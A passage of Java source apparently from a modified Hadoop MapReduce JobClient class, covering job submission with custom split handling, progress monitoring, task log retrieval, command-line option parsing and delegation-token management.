if (reduces == 0 ? jobCopy.getUseNewMapper() :
jobCopy.getUseNewReducer()) {
org.apache.hadoop.mapreduce.OutputFormat<?,?> output =
ReflectionUtils.newInstance(context.getOutputFormatClass(),
jobCopy);
output.checkOutputSpecs(context);
} else {
jobCopy.getOutputFormat().checkOutputSpecs(fs, jobCopy);
}
// Create the splits for the job
FileSystem fs = submitJobDir.getFileSystem(jobCopy);
LOG.debug("Creating splits at " + fs.makeQualified(submitJobDir));
/**
int maps = writeSplits(context, submitJobDir);
jobCopy.setNumMapTasks(maps);
**/
JobSubmitInfo splitInfo = getJobSplitInfo(context);
int maps = splitInfo.getSplitNum();
jobCopy.setNumMapTasks(maps);
// write "queue admins of the queue to which job is being submitted"
// to job file.
String queue = jobCopy.getQueueName();
AccessControlList acl = jobSubmitClient.getQueueAdmins(queue);
jobCopy.set(QueueManager.toFullPropertyName(queue,
QueueACL.ADMINISTER_JOBS.getAclName()), acl.getACLString());
/*
* Do not need
// Write job file to JobTracker's fs
FSDataOutputStream out =
FileSystem.create(fs, submitJobFile,
new FsPermission(JobSubmissionFiles.JOB_FILE_PERMISSION));
try {
jobCopy.writeXml(out);
} finally {
out.close();
}
//
*
*/
// Now, actually submit the job (using the submit name)
//
printTokens(jobId, jobCopy.getCredentials());
status = jobSubmitClient.submitJob(
jobId, submitJobDir.toString(), jobCopy.getCredentials(), splitInfo);
if (status != null) {
return new NetworkedJob(status);
} else {
throw new IOException("Could not launch job");
}
} finally {
if (status == null) {
LOG.info("Cleaning up the staging area " + submitJobDir);
if (fs != null && submitJobDir != null)
fs.delete(submitJobDir, true);
}
}
}
});
}
protected JobSubmitInfo getJobSplitInfo(JobContext context) throws IOException, InterruptedException, ClassNotFoundException {
JobConf conf = (JobConf)context.getConfiguration();
if(conf.getUseNewMapper()) {
List<org.apache.hadoop.mapreduce.InputSplit> splits =
ReflectionUtils.newInstance(context.getInputFormatClass(), conf).getSplits(context);
return new JobSubmitInfo(conf, splits.toArray(new org.apache.hadoop.mapreduce.InputSplit[splits.size()]));
}
else {
return new JobSubmitInfo(conf, conf.getInputFormat().getSplits(conf, conf.getNumMapTasks()));
}
}
@SuppressWarnings("unchecked")
private void printTokens(JobID jobId,
Credentials credentials) throws IOException {
if (LOG.isDebugEnabled()) {
LOG.debug("Printing tokens for job: " + jobId);
for(Token<?> token: credentials.getAllTokens()) {
if (token.getKind().toString().equals("HDFS_DELEGATION_TOKEN")) {
LOG.debug("Submitting with " +
DFSClient.stringifyToken((Token<org.apache.hadoop.hdfs.security.token.delegation.DelegationTokenIdentifier>) token));
}
}
}
}
@SuppressWarnings("unchecked")
private <T extends InputSplit>
int writeNewSplits(JobContext job, Path jobSubmitDir) throws IOException,
InterruptedException, ClassNotFoundException {
Configuration conf = job.getConfiguration();
InputFormat<?, ?> input =
ReflectionUtils.newInstance(job.getInputFormatClass(), conf);
List<InputSplit> splits = input.getSplits(job);
T[] array = (T[]) splits.toArray(new InputSplit[splits.size()]);
// sort the splits into order based on size, so that the biggest
// go first
Arrays.sort(array, new SplitComparator());
JobSplitWriter.createSplitFiles(jobSubmitDir, conf,
jobSubmitDir.getFileSystem(conf), array);
return array.length;
}
private int writeSplits(org.apache.hadoop.mapreduce.JobContext job,
Path jobSubmitDir) throws IOException,
InterruptedException, ClassNotFoundException {
JobConf jConf = (JobConf)job.getConfiguration();
int maps;
if (jConf.getUseNewMapper()) {
maps = writeNewSplits(job, jobSubmitDir);
} else {
maps = writeOldSplits(jConf, jobSubmitDir);
}
return maps;
}
//method to write splits for old api mapper.
private int writeOldSplits(JobConf job, Path jobSubmitDir)
throws IOException {
org.apache.hadoop.mapred.InputSplit[] splits =
job.getInputFormat().getSplits(job, job.getNumMapTasks());
// sort the splits into order based on size, so that the biggest
// go first
Arrays.sort(splits, new Comparator<org.apache.hadoop.mapred.InputSplit>() {
public int compare(org.apache.hadoop.mapred.InputSplit a,
org.apache.hadoop.mapred.InputSplit b) {
try {
long left = a.getLength();
long right = b.getLength();
if (left == right) {
return 0;
} else if (left < right) {
return 1;
} else {
return -1;
}
} catch (IOException ie) {
throw new RuntimeException("Problem getting input split size", ie);
}
}
});
JobSplitWriter.createSplitFiles(jobSubmitDir, job,
jobSubmitDir.getFileSystem(job), splits);
return splits.length;
}
private static class SplitComparator implements Comparator<InputSplit> {
@Override
public int compare(InputSplit o1, InputSplit o2) {
try {
long len1 = o1.getLength();
long len2 = o2.getLength();
if (len1 < len2) {
return 1;
} else if (len1 == len2) {
return 0;
} else {
return -1;
}
} catch (IOException ie) {
throw new RuntimeException("exception in compare", ie);
} catch (InterruptedException ie) {
throw new RuntimeException("exception in compare", ie);
}
}
}
/**
* Checks if the job directory is clean and has all the required components
* for (re) starting the job
*/
public static boolean isJobDirValid(Path jobDirPath, FileSystem fs)
throws IOException {
FileStatus[] contents = fs.listStatus(jobDirPath);
int matchCount = 0;
if (contents != null && contents.length >=2) {
for (FileStatus status : contents) {
if ("job.xml".equals(status.getPath().getName())) {
++matchCount;
}
if ("job.split".equals(status.getPath().getName())) {
++matchCount;
}
}
if (matchCount == 2) {
return true;
}
}
return false;
}
/**
* Get an {@link RunningJob} object to track an ongoing job. Returns
* null if the id does not correspond to any known job.
*
* @param jobid the jobid of the job.
* @return the {@link RunningJob} handle to track the job, null if the
* <code>jobid</code> doesn't correspond to any known job.
* @throws IOException
*/
public RunningJob getJob(JobID jobid) throws IOException {
JobStatus status = jobSubmitClient.getJobStatus(jobid);
if (status != null) {
return new NetworkedJob(status);
} else {
return null;
}
}
/**@deprecated Applications should rather use {@link #getJob(JobID)}.
*/
@Deprecated
public RunningJob getJob(String jobid) throws IOException {
return getJob(JobID.forName(jobid));
}
/**
* Get the information of the current state of the map tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the map tips.
* @throws IOException
*/
public TaskReport[] getMapTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getMapTaskReports(jobId);
}
/**@deprecated Applications should rather use {@link #getMapTaskReports(JobID)}*/
@Deprecated
public TaskReport[] getMapTaskReports(String jobId) throws IOException {
return getMapTaskReports(JobID.forName(jobId));
}
/**
* Get the information of the current state of the reduce tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the reduce tips.
* @throws IOException
*/
public TaskReport[] getReduceTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getReduceTaskReports(jobId);
}
/**
* Get the information of the current state of the cleanup tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the cleanup tips.
* @throws IOException
*/
public TaskReport[] getCleanupTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getCleanupTaskReports(jobId);
}
/**
* Get the information of the current state of the setup tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the setup tips.
* @throws IOException
*/
public TaskReport[] getSetupTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getSetupTaskReports(jobId);
}
/**@deprecated Applications should rather use {@link #getReduceTaskReports(JobID)}*/
@Deprecated
public TaskReport[] getReduceTaskReports(String jobId) throws IOException {
return getReduceTaskReports(JobID.forName(jobId));
}
/**
* Display the information about a job's tasks, of a particular type and
* in a particular state
*
* @param jobId the ID of the job
* @param type the type of the task (map/reduce/setup/cleanup)
* @param state the state of the task
* (pending/running/completed/failed/killed)
*/
public void displayTasks(JobID jobId, String type, String state)
throws IOException {
TaskReport[] reports = new TaskReport[0];
if (type.equals("map")) {
reports = getMapTaskReports(jobId);
} else if (type.equals("reduce")) {
reports = getReduceTaskReports(jobId);
} else if (type.equals("setup")) {
reports = getSetupTaskReports(jobId);
} else if (type.equals("cleanup")) {
reports = getCleanupTaskReports(jobId);
}
for (TaskReport report : reports) {
TIPStatus status = report.getCurrentStatus();
if ((state.equals("pending") && status ==TIPStatus.PENDING) ||
(state.equals("running") && status ==TIPStatus.RUNNING) ||
(state.equals("completed") && status == TIPStatus.COMPLETE) ||
(state.equals("failed") && status == TIPStatus.FAILED) ||
(state.equals("killed") && status == TIPStatus.KILLED)) {
printTaskAttempts(report);
}
}
}
private void printTaskAttempts(TaskReport report) {
if (report.getCurrentStatus() == TIPStatus.COMPLETE) {
System.out.println(report.getSuccessfulTaskAttempt());
} else if (report.getCurrentStatus() == TIPStatus.RUNNING) {
for (TaskAttemptID t :
report.getRunningTaskAttempts()) {
System.out.println(t);
}
}
}
/**
* Get status information about the Map-Reduce cluster.
*
* @return the status information about the Map-Reduce cluster as an object
* of {@link ClusterStatus}.
* @throws IOException
*/
public ClusterStatus getClusterStatus() throws IOException {
return getClusterStatus(false);
}
/**
* Get status information about the Map-Reduce cluster.
*
* @param detailed if true then get a detailed status including the
* tracker names and memory usage of the JobTracker
* @return the status information about the Map-Reduce cluster as an object
* of {@link ClusterStatus}.
* @throws IOException
*/
public ClusterStatus getClusterStatus(boolean detailed) throws IOException {
return jobSubmitClient.getClusterStatus(detailed);
}
/**
* Grab the jobtracker's view of the staging directory path where
* job-specific files will be placed.
*
* @return the staging directory where job-specific files are to be placed.
*/
public Path getStagingAreaDir() throws IOException {
if (stagingAreaDir == null) {
stagingAreaDir = new Path(jobSubmitClient.getStagingAreaDir());
}
return stagingAreaDir;
}
/**
* Get the jobs that are not completed and not failed.
*
* @return array of {@link JobStatus} for the running/to-be-run jobs.
* @throws IOException
*/
public JobStatus[] jobsToComplete() throws IOException {
return jobSubmitClient.jobsToComplete();
}
private static void downloadProfile(TaskCompletionEvent e
) throws IOException {
URLConnection connection =
new URL(getTaskLogURL(e.getTaskAttemptId(), e.getTaskTrackerHttp()) +
"&filter=profile").openConnection();
InputStream in = connection.getInputStream();
OutputStream out = new FileOutputStream(e.getTaskAttemptId() + ".profile");
IOUtils.copyBytes(in, out, 64 * 1024, true);
}
/**
* Get the jobs that are submitted.
*
* @return array of {@link JobStatus} for the submitted jobs.
* @throws IOException
*/
public JobStatus[] getAllJobs() throws IOException {
return jobSubmitClient.getAllJobs();
}
/**
* Utility that submits a job, then polls for progress until the job is
* complete.
*
* @param job the job configuration.
* @throws IOException if the job fails
*/
public static RunningJob runJob(JobConf job) throws IOException {
JobClient jc = new JobClient(job);
RunningJob rj = jc.submitJob(job);
try {
if (!jc.monitorAndPrintJob(job, rj)) {
LOG.info("Job Failed: " + rj.getFailureInfo());
throw new IOException("Job failed!");
}
} catch (InterruptedException ie) {
Thread.currentThread().interrupt();
}
return rj;
}
/**
* @return true if the profile parameters indicate that this is using
* hprof, which generates profile files in a particular location
* that we can retrieve to the client.
*/
private boolean shouldDownloadProfile(JobConf conf) {
// Check the argument string that was used to initialize profiling.
// If this indicates hprof and file-based output, then we're ok to
// download.
String profileParams = conf.getProfileParams();
if (null == profileParams) {
return false;
}
// Split this on whitespace.
String [] parts = profileParams.split("[ \\t]+");
// If any of these indicate hprof, and the use of output files, return true.
boolean hprofFound = false;
boolean fileFound = false;
for (String p : parts) {
if (p.startsWith("-agentlib:hprof") || p.startsWith("-Xrunhprof")) {
hprofFound = true;
// This contains a number of comma-delimited components, one of which
// may specify the file to write to. Make sure this is present and
// not empty.
String [] subparts = p.split(",");
for (String sub : subparts) {
if (sub.startsWith("file=") && sub.length() != "file=".length()) {
fileFound = true;
}
}
}
}
return hprofFound && fileFound;
}
/**
* Monitor a job and print status in real-time as progress is made and tasks
* fail.
* @param conf the job's configuration
* @param job the job to track
* @return true if the job succeeded
* @throws IOException if communication to the JobTracker fails
*/
public boolean monitorAndPrintJob(JobConf conf,
RunningJob job
) throws IOException, InterruptedException {
String lastReport = null;
TaskStatusFilter filter;
filter = getTaskOutputFilter(conf);
JobID jobId = job.getID();
LOG.info("Running job: " + jobId);
int eventCounter = 0;
boolean profiling = conf.getProfileEnabled();
Configuration.IntegerRanges mapRanges = conf.getProfileTaskRange(true);
Configuration.IntegerRanges reduceRanges = conf.getProfileTaskRange(false);
while (!job.isComplete()) {
Thread.sleep(this.progMonitorPollIntervalMillis);
String report =
(" map " + StringUtils.formatPercent(job.mapProgress(), 0)+
" reduce " +
StringUtils.formatPercent(job.reduceProgress(), 0));
if (!report.equals(lastReport)) {
LOG.info(report);
lastReport = report;
}
TaskCompletionEvent[] events =
job.getTaskCompletionEvents(eventCounter);
eventCounter += events.length;
for(TaskCompletionEvent event : events){
TaskCompletionEvent.Status status = event.getTaskStatus();
if (profiling && shouldDownloadProfile(conf) &&
(status == TaskCompletionEvent.Status.SUCCEEDED ||
status == TaskCompletionEvent.Status.FAILED) &&
(event.isMap ? mapRanges : reduceRanges).
isIncluded(event.idWithinJob())) {
downloadProfile(event);
}
switch(filter){
case NONE:
break;
case SUCCEEDED:
if (event.getTaskStatus() ==
TaskCompletionEvent.Status.SUCCEEDED){
LOG.info(event.toString());
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
}
break;
case FAILED:
if (event.getTaskStatus() ==
TaskCompletionEvent.Status.FAILED){
LOG.info(event.toString());
// Displaying the task diagnostic information
TaskAttemptID taskId = event.getTaskAttemptId();
String[] taskDiagnostics =
jobSubmitClient.getTaskDiagnostics(taskId);
if (taskDiagnostics != null) {
for(String diagnostics : taskDiagnostics){
System.err.println(diagnostics);
}
}
// Displaying the task logs
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
}
break;
case KILLED:
if (event.getTaskStatus() == TaskCompletionEvent.Status.KILLED){
LOG.info(event.toString());
}
break;
case ALL:
LOG.info(event.toString());
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
break;
}
}
}
LOG.info("Job complete: " + jobId);
Counters counters = null;
try{
counters = job.getCounters();
} catch(IOException ie) {
counters = null;
LOG.info(ie.getMessage());
}
if (counters != null) {
counters.log(LOG);
}
return job.isSuccessful();
}
static String getTaskLogURL(TaskAttemptID taskId, String baseUrl) {
return (baseUrl + "/tasklog?plaintext=true&attemptid=" + taskId);
}
private static void displayTaskLogs(TaskAttemptID taskId, String baseUrl)
throws IOException {
// The tasktracker for a 'failed/killed' job might not be around...
if (baseUrl != null) {
// Construct the url for the tasklogs
String taskLogUrl = getTaskLogURL(taskId, baseUrl);
// Copy tasks's stdout of the JobClient
getTaskLogs(taskId, new URL(taskLogUrl+"&filter=stdout"), System.out);
// Copy task's stderr to stderr of the JobClient
getTaskLogs(taskId, new URL(taskLogUrl+"&filter=stderr"), System.err);
}
}
private static void getTaskLogs(TaskAttemptID taskId, URL taskLogUrl,
OutputStream out) {
try {
URLConnection connection = taskLogUrl.openConnection();
connection.setReadTimeout(tasklogtimeout);
connection.setConnectTimeout(tasklogtimeout);
BufferedReader input =
new BufferedReader(new InputStreamReader(connection.getInputStream()));
BufferedWriter output =
new BufferedWriter(new OutputStreamWriter(out));
try {
String logData = null;
while ((logData = input.readLine()) != null) {
if (logData.length() > 0) {
output.write(taskId + ": " + logData + "\n");
output.flush();
}
}
} finally {
input.close();
}
}catch(IOException ioe){
LOG.warn("Error reading task output" + ioe.getMessage());
}
}
static Configuration getConfiguration(String jobTrackerSpec)
{
Configuration conf = new Configuration();
if (jobTrackerSpec != null) {
if (jobTrackerSpec.indexOf(":") >= 0) {
conf.set("mapred.job.tracker", jobTrackerSpec);
} else {
String classpathFile = "hadoop-" + jobTrackerSpec + ".xml";
URL validate = conf.getResource(classpathFile);
if (validate == null) {
throw new RuntimeException(classpathFile + " not found on CLASSPATH");
}
conf.addResource(classpathFile);
}
}
return conf;
}
/**
* Sets the output filter for tasks. only those tasks are printed whose
* output matches the filter.
* @param newValue task filter.
*/
@Deprecated
public void setTaskOutputFilter(TaskStatusFilter newValue){
this.taskOutputFilter = newValue;
}
/**
* Get the task output filter out of the JobConf.
*
* @param job the JobConf to examine.
* @return the filter level.
*/
public static TaskStatusFilter getTaskOutputFilter(JobConf job) {
return TaskStatusFilter.valueOf(job.get("jobclient.output.filter",
"FAILED"));
}
/**
* Modify the JobConf to set the task output filter.
*
* @param job the JobConf to modify.
* @param newValue the value to set.
*/
public static void setTaskOutputFilter(JobConf job,
TaskStatusFilter newValue) {
job.set("jobclient.output.filter", newValue.toString());
}
/**
* Returns task output filter.
* @return task filter.
*/
@Deprecated
public TaskStatusFilter getTaskOutputFilter(){
return this.taskOutputFilter;
}
private String getJobPriorityNames() {
StringBuffer sb = new StringBuffer();
for (JobPriority p : JobPriority.values()) {
sb.append(p.name()).append(" ");
}
return sb.substring(0, sb.length()-1);
}
/**
* Display usage of the command-line tool and terminate execution
*/
private void displayUsage(String cmd) {
String prefix = "Usage: JobClient ";
String jobPriorityValues = getJobPriorityNames();
String taskTypes = "map, reduce, setup, cleanup";
String taskStates = "running, completed";
if("-submit".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-file>]");
} else if ("-status".equals(cmd) || "-kill".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id>]");
} else if ("-counter".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <group-name> <counter-name>]");
} else if ("-events".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <from-event-#> <#-of-events>]");
} else if ("-history".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <jobOutputDir>]");
} else if ("-list".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " [all]]");
} else if ("-kill-task".equals(cmd) || "-fail-task".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <task-id>]");
} else if ("-set-priority".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <priority>]. " +
"Valid values for priorities are: "
+ jobPriorityValues);
} else if ("-list-active-trackers".equals(cmd)) {
System.err.println(prefix + "[" + cmd + "]");
} else if ("-list-blacklisted-trackers".equals(cmd)) {
System.err.println(prefix + "[" + cmd + "]");
} else if ("-list-attempt-ids".equals(cmd)) {
System.err.println(prefix + "[" + cmd +
" <job-id> <task-type> <task-state>]. " +
"Valid values for <task-type> are " + taskTypes + ". " +
"Valid values for <task-state> are " + taskStates);
} else {
System.err.printf(prefix + "<command> <args>\n");
System.err.printf("\t[-submit <job-file>]\n");
System.err.printf("\t[-status <job-id>]\n");
System.err.printf("\t[-counter <job-id> <group-name> <counter-name>]\n");
System.err.printf("\t[-kill <job-id>]\n");
System.err.printf("\t[-set-priority <job-id> <priority>]. " +
"Valid values for priorities are: " +
jobPriorityValues + "\n");
System.err.printf("\t[-events <job-id> <from-event-#> <#-of-events>]\n");
System.err.printf("\t[-history <jobOutputDir>]\n");
System.err.printf("\t[-list [all]]\n");
System.err.printf("\t[-list-active-trackers]\n");
System.err.printf("\t[-list-blacklisted-trackers]\n");
System.err.println("\t[-list-attempt-ids <job-id> <task-type> " +
"<task-state>]\n");
System.err.printf("\t[-kill-task <task-id>]\n");
System.err.printf("\t[-fail-task <task-id>]\n\n");
ToolRunner.printGenericCommandUsage(System.out);
}
}
public int run(String[] argv) throws Exception {
int exitCode = -1;
if (argv.length < 1) {
displayUsage("");
return exitCode;
}
// process arguments
String cmd = argv[0];
String submitJobFile = null;
String jobid = null;
String taskid = null;
String outputDir = null;
String counterGroupName = null;
String counterName = null;
String newPriority = null;
String taskType = null;
String taskState = null;
int fromEvent = 0;
int nEvents = 0;
boolean getStatus = false;
boolean getCounter = false;
boolean killJob = false;
boolean listEvents = false;
boolean viewHistory = false;
boolean viewAllHistory = false;
boolean listJobs = false;
boolean listAllJobs = false;
boolean listActiveTrackers = false;
boolean listBlacklistedTrackers = false;
boolean displayTasks = false;
boolean killTask = false;
boolean failTask = false;
boolean setJobPriority = false;
if ("-submit".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
submitJobFile = argv[1];
} else if ("-status".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
getStatus = true;
} else if("-counter".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
getCounter = true;
jobid = argv[1];
counterGroupName = argv[2];
counterName = argv[3];
} else if ("-kill".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
killJob = true;
} else if ("-set-priority".equals(cmd)) {
if (argv.length != 3) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
newPriority = argv[2];
try {
JobPriority jp = JobPriority.valueOf(newPriority);
} catch (IllegalArgumentException iae) {
displayUsage(cmd);
return exitCode;
}
setJobPriority = true;
} else if ("-events".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
fromEvent = Integer.parseInt(argv[2]);
nEvents = Integer.parseInt(argv[3]);
listEvents = true;
} else if ("-history".equals(cmd)) {
if (argv.length != 2 && !(argv.length == 3 && "all".equals(argv[1]))) {
displayUsage(cmd);
return exitCode;
}
viewHistory = true;
if (argv.length == 3 && "all".equals(argv[1])) {
viewAllHistory = true;
outputDir = argv[2];
} else {
outputDir = argv[1];
}
} else if ("-list".equals(cmd)) {
if (argv.length != 1 && !(argv.length == 2 && "all".equals(argv[1]))) {
displayUsage(cmd);
return exitCode;
}
if (argv.length == 2 && "all".equals(argv[1])) {
listAllJobs = true;
} else {
listJobs = true;
}
} else if("-kill-task".equals(cmd)) {
if(argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
killTask = true;
taskid = argv[1];
} else if("-fail-task".equals(cmd)) {
if(argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
failTask = true;
taskid = argv[1];
} else if ("-list-active-trackers".equals(cmd)) {
if (argv.length != 1) {
displayUsage(cmd);
return exitCode;
}
listActiveTrackers = true;
} else if ("-list-blacklisted-trackers".equals(cmd)) {
if (argv.length != 1) {
displayUsage(cmd);
return exitCode;
}
listBlacklistedTrackers = true;
} else if ("-list-attempt-ids".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
taskType = argv[2];
taskState = argv[3];
displayTasks = true;
} else {
displayUsage(cmd);
return exitCode;
}
// initialize JobClient
JobConf conf = null;
if (submitJobFile != null) {
conf = new JobConf(submitJobFile);
} else {
conf = new JobConf(getConf());
}
init(conf);
// Submit the request
try {
if (submitJobFile != null) {
RunningJob job = submitJob(conf);
System.out.println("Created job " + job.getID());
exitCode = 0;
} else if (getStatus) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
Counters counters = job.getCounters();
System.out.println();
System.out.println(job);
if (counters != null) {
System.out.println(counters);
} else {
System.out.println("Counters not available. Job is retired.");
}
exitCode = 0;
}
} else if (getCounter) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
Counters counters = job.getCounters();
if (counters == null) {
System.out.println("Counters not available for retired job " +
jobid);
exitCode = -1;
} else {
Group group = counters.getGroup(counterGroupName);
Counter counter = group.getCounterForName(counterName);
System.out.println(counter.getCounter());
exitCode = 0;
}
}
} else if (killJob) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
job.killJob();
System.out.println("Killed job " + jobid);
exitCode = 0;
}
} else if (setJobPriority) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
job.setJobPriority(newPriority);
System.out.println("Changed job priority.");
exitCode = 0;
}
} else if (viewHistory) {
viewHistory(outputDir, viewAllHistory);
exitCode = 0;
} else if (listEvents) {
listEvents(JobID.forName(jobid), fromEvent, nEvents);
exitCode = 0;
} else if (listJobs) {
listJobs();
exitCode = 0;
} else if (listAllJobs) {
listAllJobs();
exitCode = 0;
} else if (listActiveTrackers) {
listActiveTrackers();
exitCode = 0;
} else if (listBlacklistedTrackers) {
listBlacklistedTrackers();
exitCode = 0;
} else if (displayTasks) {
displayTasks(JobID.forName(jobid), taskType, taskState);
} else if(killTask) {
if(jobSubmitClient.killTask(TaskAttemptID.forName(taskid), false)) {
System.out.println("Killed task " + taskid);
exitCode = 0;
} else {
System.out.println("Could not kill task " + taskid);
exitCode = -1;
}
} else if(failTask) {
if(jobSubmitClient.killTask(TaskAttemptID.forName(taskid), true)) {
System.out.println("Killed task " + taskid + " by failing it");
exitCode = 0;
} else {
System.out.println("Could not fail task " + taskid);
exitCode = -1;
}
}
} catch (RemoteException re){
IOException unwrappedException = re.unwrapRemoteException();
if (unwrappedException instanceof AccessControlException) {
System.out.println(unwrappedException.getMessage());
} else {
throw re;
}
} finally {
close();
}
return exitCode;
}
private void viewHistory(String outputDir, boolean all)
throws IOException {
HistoryViewer historyViewer = new HistoryViewer(outputDir,
getConf(), all);
historyViewer.print();
}
/**
* List the events for the given job
* @param jobId the job id for the job's events to list
* @throws IOException
*/
private void listEvents(JobID jobId, int fromEventId, int numEvents)
throws IOException {
TaskCompletionEvent[] events =
jobSubmitClient.getTaskCompletionEvents(jobId, fromEventId, numEvents);
System.out.println("Task completion events for " + jobId);
System.out.println("Number of events (from " + fromEventId +
") are: " + events.length);
for(TaskCompletionEvent event: events) {
System.out.println(event.getTaskStatus() + " " + event.getTaskAttemptId() + " " +
getTaskLogURL(event.getTaskAttemptId(),
event.getTaskTrackerHttp()));
}
}
/**
* Dump a list of currently running jobs
* @throws IOException
*/
private void listJobs() throws IOException {
JobStatus[] jobs = jobsToComplete();
if (jobs == null)
jobs = new JobStatus[0];
System.out.printf("%d jobs currently running\n", jobs.length);
displayJobList(jobs);
}
/**
* Dump a list of all jobs submitted.
* @throws IOException
*/
private void listAllJobs() throws IOException {
JobStatus[] jobs = getAllJobs();
if (jobs == null)
jobs = new JobStatus[0];
System.out.printf("%d jobs submitted\n", jobs.length);
System.out.printf("States are:\n\tRunning : 1\tSucceded : 2" +
"\tFailed : 3\tPrep : 4\n");
displayJobList(jobs);
}
/**
* Display the list of active trackers
*/
private void listActiveTrackers() throws IOException {
ClusterStatus c = jobSubmitClient.getClusterStatus(true);
Collection<String> trackers = c.getActiveTrackerNames();
for (String trackerName : trackers) {
System.out.println(trackerName);
}
}
/**
* Display the list of blacklisted trackers
*/
private void listBlacklistedTrackers() throws IOException {
ClusterStatus c = jobSubmitClient.getClusterStatus(true);
Collection<String> trackers = c.getBlacklistedTrackerNames();
for (String trackerName : trackers) {
System.out.println(trackerName);
}
}
void displayJobList(JobStatus[] jobs) {
System.out.printf("JobId\tState\tStartTime\tUserName\tPriority\tSchedulingInfo\n");
for (JobStatus job : jobs) {
System.out.printf("%s\t%d\t%d\t%s\t%s\t%s\n", job.getJobID(), job.getRunState(),
job.getStartTime(), job.getUsername(),
job.getJobPriority().name(), job.getSchedulingInfo());
}
}
/**
* Get status information about the max available Maps in the cluster.
*
* @return the max available Maps in the cluster
* @throws IOException
*/
public int getDefaultMaps() throws IOException {
return getClusterStatus().getMaxMapTasks();
}
/**
* Get status information about the max available Reduces in the cluster.
*
* @return the max available Reduces in the cluster
* @throws IOException
*/
public int getDefaultReduces() throws IOException {
return getClusterStatus().getMaxReduceTasks();
}
/**
* Grab the jobtracker system directory path where job-specific files are to be placed.
*
* @return the system directory where job-specific files are to be placed.
*/
public Path getSystemDir() {
if (sysDir == null) {
sysDir = new Path(jobSubmitClient.getSystemDir());
}
return sysDir;
}
/**
* Return an array of queue information objects about all the Job Queues
* configured.
*
* @return Array of JobQueueInfo objects
* @throws IOException
*/
public JobQueueInfo[] getQueues() throws IOException {
return jobSubmitClient.getQueues();
}
/**
* Gets all the jobs which were added to particular Job Queue
*
* @param queueName name of the Job Queue
* @return Array of jobs present in the job queue
* @throws IOException
*/
public JobStatus[] getJobsFromQueue(String queueName) throws IOException {
return jobSubmitClient.getJobsFromQueue(queueName);
}
/**
* Gets the queue information associated to a particular Job Queue
*
* @param queueName name of the job queue.
* @return Queue information associated to particular queue.
* @throws IOException
*/
public JobQueueInfo getQueueInfo(String queueName) throws IOException {
return jobSubmitClient.getQueueInfo(queueName);
}
/**
* Gets the Queue ACLs for current user
* @return array of QueueAclsInfo object for current user.
* @throws IOException
*/
public QueueAclsInfo[] getQueueAclsForCurrentUser() throws IOException {
return jobSubmitClient.getQueueAclsForCurrentUser();
}
/* Get a delegation token for the user from the JobTracker.
* @param renewer the user who can renew the token
* @return the new token
* @throws IOException
*/
public Token<DelegationTokenIdentifier>
getDelegationToken(Text renewer) throws IOException, InterruptedException {
Token<DelegationTokenIdentifier> result =
jobSubmitClient.getDelegationToken(renewer);
InetSocketAddress addr = JobTracker.getAddress(getConf());
StringBuilder service = new StringBuilder();
service.append(NetUtils.normalizeHostName(addr.getAddress().
getHostAddress()));
service.append(':');
service.append(addr.getPort());
result.setService(new Text(service.toString()));
return result;
}
/**
* Renew a delegation token
* @param token the token to renew
* @return the new expiration time
* @throws InvalidToken
* @throws IOException
*/
public long renewDelegationToken(Token<DelegationTokenIdentifier> token)
throws InvalidToken, IOException, InterruptedException {
try {
return jobSubmitClient.renewDelegationToken(token);
} catch (RemoteException re) {
throw re.unwrapRemoteException(InvalidToken.class,
AccessControlException.class);
}
}
/**
* Cancel a delegation token from the JobTracker
* @param token the token to cancel
* @throws IOException
*/
public void cancelDelegationToken(Token<DelegationTokenIdentifier> token
) throws IOException,
InterruptedException {
try {
jobSubmitClient.cancelDelegationToken(token);
} catch (RemoteException re) {
throw re.unwrapRemoteException(InvalidToken.class,
AccessControlException.class);
}
}
/**
*/
public static void main(String argv[]) throws Exception {
int res = ToolRunner.run(new JobClient(), argv);
System.exit(res);
}
@SuppressWarnings("unchecked")
private void readTokensFromFiles(Configuration conf, Credentials credentials
) throws IOException {
// add tokens and secrets coming from a token storage file
String binaryTokenFilename =
conf.get("mapreduce.job.credentials.binary");
if (binaryTokenFilename != null) {
Credentials binary =
Credentials.readTokenStorageFile(new Path("file:///" +
binaryTokenFilename), conf);
credentials.addAll(binary);
}
// add secret keys coming from a json file
String tokensFileName = conf.get("mapreduce.job.credentials.json");
if(tokensFileName != null) {
